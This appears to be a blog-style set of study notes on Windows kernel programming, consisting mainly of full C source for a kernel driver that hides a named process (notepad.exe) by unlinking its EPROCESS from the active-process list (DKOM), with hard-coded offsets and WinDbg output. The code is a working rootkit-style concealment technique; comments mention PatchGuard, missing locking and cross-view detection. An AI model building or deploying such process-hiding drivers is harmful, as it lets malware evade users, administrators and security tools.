I have recently been learning Windows kernel programming; these are my study notes on one classic technique.
Principle (DKOM): unlink the target process's EPROCESS from the kernel's doubly-linked list of active processes (the ActiveProcessLinks LIST_ENTRY inside EPROCESS), so that anything enumerating processes by walking that list no longer finds it. Note that only list-based enumeration is affected; the process still exists and remains reachable through other kernel structures (handle tables, the PID table, scheduler data), which is how cross-view detection tools find hidden processes.
Once unlinked, the process can no longer be seen with WinDbg's `!process 0 0`, which walks the same list (see the kd output in HideProcess below).
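#include "HideProcess.h"

/*
 * Hard-coded _EPROCESS field offsets.
 *
 * These values are build-specific: the 64-bit ones are taken from the
 * Windows 7 x64 kd session quoted in HideProcess() below, the 32-bit ones
 * from the matching x86 build.  They are NOT valid on other Windows
 * versions; loading this driver on a different build will read and write
 * the wrong fields and bugcheck.  A real implementation must resolve the
 * offsets per build (symbols, a version table, or an exported accessor)
 * before touching the list.
 */
#if defined(_WIN64) || defined(WIN64)
#define ACTIVEPROCESSLINKS_EPROCESS 0x188   /* _EPROCESS.ActiveProcessLinks : _LIST_ENTRY */
#define IMAGEFILENAME_EPROCESS      0x2e0   /* _EPROCESS.ImageFileName     : UCHAR[16] */
#else
#define ACTIVEPROCESSLINKS_EPROCESS 0x088
#define IMAGEFILENAME_EPROCESS      0x174
#endif

/* _EPROCESS.ImageFileName is a 16-byte array: at most 15 characters + NUL. */
#define IMAGEFILENAME_LENGTH 16

/*
 * Copy the 16-byte ImageFileName field into a caller-supplied buffer and
 * force NUL termination, so that string functions never run past the field
 * even if the source is not terminated (e.g. when the walk reaches a node
 * that is not really an EPROCESS).
 */
static void CopyImageFileName(CHAR *Dst, const CHAR *Src)
{
    int i;

    for (i = 0; i < IMAGEFILENAME_LENGTH - 1 && Src[i] != '\0'; i++) {
        Dst[i] = Src[i];
    }
    Dst[i] = '\0';
}

/*
 * Driver entry point.
 *
 * Creates the control device and its symbolic link (names come from
 * HideProcess.h), installs a pass-through dispatch routine for every IRP
 * major code, registers the unload routine, and then tries to hide
 * "notepad.exe".  Returns the failing NTSTATUS if device or link creation
 * fails, STATUS_SUCCESS otherwise (the hide result is only logged).
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegisterPath)
{
    PDEVICE_OBJECT DeviceObject = NULL;
    NTSTATUS Status;
    UNICODE_STRING DeviceName;
    UNICODE_STRING LinkName;
    int i;

    (void)RegisterPath;

    RtlInitUnicodeString(&DeviceName, DEVICE_NAME);
    RtlInitUnicodeString(&LinkName, LINK_NAME);

    Status = IoCreateDevice(DriverObject, 0, &DeviceName, FILE_DEVICE_UNKNOWN,
                            0, FALSE, &DeviceObject);
    if (!NT_SUCCESS(Status)) {
        return Status;
    }

    /*
     * The original ignored this status: on failure the device object was
     * leaked and the driver reported success with a half-initialised state.
     */
    Status = IoCreateSymbolicLink(&LinkName, &DeviceName);
    if (!NT_SUCCESS(Status)) {
        IoDeleteDevice(DeviceObject);
        return Status;
    }

    /*
     * MajorFunction has IRP_MJ_MAXIMUM_FUNCTION + 1 slots; "<=" is needed so
     * the last slot is covered too (the original "<" left it at the default).
     */
    for (i = 0; i <= IRP_MJ_MAXIMUM_FUNCTION; i++) {
        DriverObject->MajorFunction[i] = DefaultPassThrough;
    }
    DriverObject->DriverUnload = UnloadDriver;

    /* HideProcess() now really reports "not found", so this message is reachable. */
    if (HideProcess("notepad.exe") == FALSE) {
        DbgPrint("No exist\r\n");
    }

#if defined(_WIN64) || defined(WIN64)
    DbgPrint("win64:hideprocess is RUNNING!!!");
#else
    DbgPrint("win32:hideprocess SIS RUNNING!!!");
#endif

    return STATUS_SUCCESS;
}

/*
 * Dispatch routine for every IRP major code: completes the request
 * successfully with zero bytes of information.  The driver exposes no
 * real I/O interface.
 */
NTSTATUS DefaultPassThrough(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
    (void)DeviceObject;

    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}

/*
 * Unload routine: removes the symbolic link and every device object owned
 * by this driver.
 *
 * NOTE(review): the process unlinked by HideProcess() is NOT re-inserted
 * into the active-process list here; it stays hidden after unload.
 */
VOID UnloadDriver(PDRIVER_OBJECT DriverObject)
{
    UNICODE_STRING LinkName;
    PDEVICE_OBJECT CurrentDevice;
    PDEVICE_OBJECT NextDevice;

    RtlInitUnicodeString(&LinkName, LINK_NAME);
    IoDeleteSymbolicLink(&LinkName);

    /* Grab NextDevice before deleting, since the object is gone afterwards. */
    for (CurrentDevice = DriverObject->DeviceObject; CurrentDevice != NULL;
         CurrentDevice = NextDevice) {
        NextDevice = CurrentDevice->NextDevice;
        IoDeleteDevice(CurrentDevice);
    }

    DbgPrint("hideprocess is STOPPED!!!");
}

/*
 * Unlink the first process whose ImageFileName contains ProcessImageName
 * from the active-process list.
 *
 * Returns TRUE when a matching process was found and unlinked, FALSE when
 * the argument is empty or no process matched.  (The original returned
 * TRUE unconditionally, so DriverEntry's "No exist" path was dead code.)
 *
 * How the walk works: starting from the current process, follow Flink and
 * stop when the node *before* the starting process is reached.  DriverEntry
 * normally runs in the System process, which is the first entry after the
 * list head, so that predecessor is the list head itself (not an EPROCESS)
 * and the walk visits every real process exactly once.  If this routine is
 * ever called from another process context that assumption breaks: the
 * list head would be visited as if it were an EPROCESS and the caller's
 * predecessor would be skipped.
 *
 * Security caveats a practitioner should know before using this:
 *  - No synchronisation: the kernel guards this list with an internal
 *    (non-exported) lock.  Walking and modifying it without that lock races
 *    with process creation and exit.
 *  - On x64, PatchGuard verifies the process list (bugcheck 0x109 reports
 *    "process list corruption"), so the unlink is expected to trigger a
 *    bugcheck sooner or later.
 *  - The hidden process still appears in other kernel views (handle tables,
 *    PID table, thread lists); cross-view detection finds it.
 *
 * Reference kd output (Windows 7 x64) from which the offsets were taken:
 *   kd> !process 0 0
 *   PROCESS fffffa8031ec9060  SessionId: 1  Cid: 073c  Peb: 7fffffdf000  ParentCid: 06f8
 *       DirBase: 7fb21000  ObjectTable: fffff8a001ea3600  HandleCount: 545.
 *       Image: explorer.exe
 *   kd> dt _EPROCESS fffffa8031ec9060
 *      +0x000 Pcb                : _KPROCESS
 *      +0x160 ProcessLock        : _EX_PUSH_LOCK
 *      +0x168 CreateTime         : _LARGE_INTEGER 0x01d29b23`d17ef664
 *      +0x170 ExitTime           : _LARGE_INTEGER 0x0
 *      +0x178 RundownProtect     : _EX_RUNDOWN_REF
 *      +0x180 UniqueProcessId    : 0x00000000`0000073c Void
 *      +0x188 ActiveProcessLinks : _LIST_ENTRY [ 0xfffffa80`31aeb1e8 - 0xfffffa80`3265da98 ]
 *      +0x198 ProcessQuotaUsage  : [2] 0x3dc8
 *   kd> dt _LIST_ENTRY
 *      +0x000 Flink : Ptr64 _LIST_ENTRY   (next)
 *      +0x008 Blink : Ptr64 _LIST_ENTRY   (previous)
 *   kd> dt _EPROCESS 0xfffffa80`31aeb1e8-0x188
 *      +0x188 ActiveProcessLinks : _LIST_ENTRY [ 0xfffffa80`31ec84d8 - 0xfffffa80`31ec91e8 ]
 *      +0x2e0 ImageFileName      : "vmtoolsd.exe"
 */
BOOLEAN HideProcess(CHAR *ProcessImageName)
{
    PEPROCESS StartProcess;
    PEPROCESS Current;
    PEPROCESS StopAt;
    PLIST_ENTRY Links;
    CHAR ImageName[IMAGEFILENAME_LENGTH];
    BOOLEAN Found = FALSE;

    /* strstr("anything", "") matches every process; reject that up front. */
    if (ProcessImageName == NULL || ProcessImageName[0] == '\0') {
        return FALSE;
    }

    StartProcess = PsGetCurrentProcess();
    if (StartProcess == NULL) {
        return FALSE;
    }

    /*
     * The original read ImageFileName through a still-NULL pointer here
     * (NULL + IMAGEFILENAME_EPROCESS) and handed it to DbgPrint("%s");
     * read it from the real starting process instead.
     */
    CopyImageFileName(ImageName, (const CHAR *)StartProcess + IMAGEFILENAME_EPROCESS);
    DbgPrint("currentimagefilename:%s\r\n", ImageName);

    /* The node before the starting process is where the walk terminates. */
    Links  = (PLIST_ENTRY)((ULONG_PTR)StartProcess + ACTIVEPROCESSLINKS_EPROCESS);
    StopAt = (PEPROCESS)((ULONG_PTR)Links->Blink - ACTIVEPROCESSLINKS_EPROCESS);

    for (Current = StartProcess; Current != StopAt;
         Current = (PEPROCESS)((ULONG_PTR)Links->Flink - ACTIVEPROCESSLINKS_EPROCESS)) {
        Links = (PLIST_ENTRY)((ULONG_PTR)Current + ACTIVEPROCESSLINKS_EPROCESS);
        CopyImageFileName(ImageName, (const CHAR *)Current + IMAGEFILENAME_EPROCESS);

        if (strstr(ImageName, ProcessImageName) != NULL) {
            RemoveEntryList(Links);

            /*
             * Point the unlinked entry at itself.  When the hidden process
             * exits, the kernel calls RemoveEntryList on this same entry;
             * with self-links that call rewrites only this node, instead of
             * writing through the stale Flink/Blink into neighbours that may
             * have changed or been freed since we unlinked (list corruption
             * and a bugcheck in the original).
             */
            Links->Flink = Links;
            Links->Blink = Links;

            Found = TRUE;
            break;
        }
    }

    return Found;
}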
Ring-0 (kernel-mode) process hiding via DKOM on the EPROCESS ActiveProcessLinks list